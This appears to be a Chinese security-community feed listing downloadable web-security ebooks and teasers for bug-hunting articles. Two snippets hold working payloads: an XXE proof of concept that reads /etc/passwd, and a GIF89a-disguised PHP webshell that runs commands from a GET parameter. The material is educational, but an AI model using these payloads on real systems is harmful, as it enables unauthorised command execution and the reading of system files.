下载地址：http://i0x0fy4ibf.feishu.cn/file/boxcnP2siX6p3DN3YjKEomok3kb 简介 0x00 众里寻他千百度 0x01 精骛八极,心游万仞 0x02 天下大事，必作于细 0x03 不破楼兰终不还 0x04 工欲善其事，...

地址：http://i0x0fy4ibf.feishu.cn/file/boxcn1w1nZXPVtJa8lVa7wsw8Fg 简介： 0x01 漏洞介绍 0x02 漏洞代码 0x03 漏洞复现 0x04 漏洞危害 0x05 修复方案 0x06 漏洞场景

下载地址： http://i0x0fy4ibf.feishu.cn/file/boxcnGP6wJS4lNvwLEESnZrfvhh

下载地址：http://i0x0fy4ibf.feishu.cn/file/boxcnWEh8qDe4C1YCEIsDTQkKVh

那些年我们一起学XSS 下载地址：http://i0x0fy4ibf.feishu.cn/file/boxcneWUeidPmbE15ZSYtydSSOg

下载地址：http://i0x0fy4ibf.feishu.cn/file/boxcnMmfJEQCTDLUjcxMXoy5SUb 简要概述：《Web之困》的第二章

下载地址：http://i0x0fy4ibf.feishu.cn/file/boxcn2URNkjgnmIC6rrTp6yet4g

有回显，用以下poc直接读取/etc/passwd： <?xml version='1.0'?> <!DOCTYPE foo [ <!ELEMENT foo (#ANY)> <!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><foo>&am...

信息收集之快速提取SSL证书里的域名 echo '唯品会（原Vipshop.com）特卖会：品牌特卖_确保正品_确保低价_货到付款' | httpx -tls-probe -json -silent | jq .tls.dns_names #安全小天地Zone Tip...

#原创文章# 前言 上次听了火器的线上分享会议有提到火器的资产关联大概的思路，真的是收获了很多。再夸夸火器，在挖一些项目中的确能省掉很多资产收集的时间。本文主要参考上次会议中提交的一些...

无敏感函数的php一句话(php中可用`来执行系统命令，相当于system、eval等函数)，执行命令:shell.php?1=whoami Gif89a <?php $a = `$_GET[1]`; echo $a; ?> 文字来源于- 火线 Zone-云安全...

http://github.com/ggg4566/SQLEXP SQL 注入利用工具，存在waf的情况下自定义编写tamper脚本 dump数据. 对于SQL注入漏洞利用通常情况下我们使用SQLMAP，在waf存在的场景下想利用自己独有的paylo...

web漏洞挖掘指南 前端跨域漏洞 一、何为跨域 1.设想一种场景，一个恶意网站上嵌入了一个iframe标签去加载银行的登陆页面，高度和宽度的设置和真实的银行官网一样，当用户访问恶意网站并登录时，...

前言： 第一次挖这家src，看src自己给出的资产(赞一个)，打开网站是一个电子商务C2C业务，大致扫了一眼业务，网站功能挺多的，出了不少货，挖的过程中，导致一些诡异的逻辑被触发了，在此仅对系...

漏洞报告 Mattermost #1216203 Mattermost Server OAuth Flow Cross-Site Scripting Kubernetes #1167773 Loading YAML in Java client can lead to command execution Nextcloud #1194606 Virt...

0x01 作为一个在安全小天地平台挖洞一年多的菜鸡，也是利用这段时间成功的从一个小菜鸡变成了一个大菜鸡。 0x02 在我个人看来挖src最重要的便是信息收集以及挖洞思路，挖洞思路的话可以去安全小...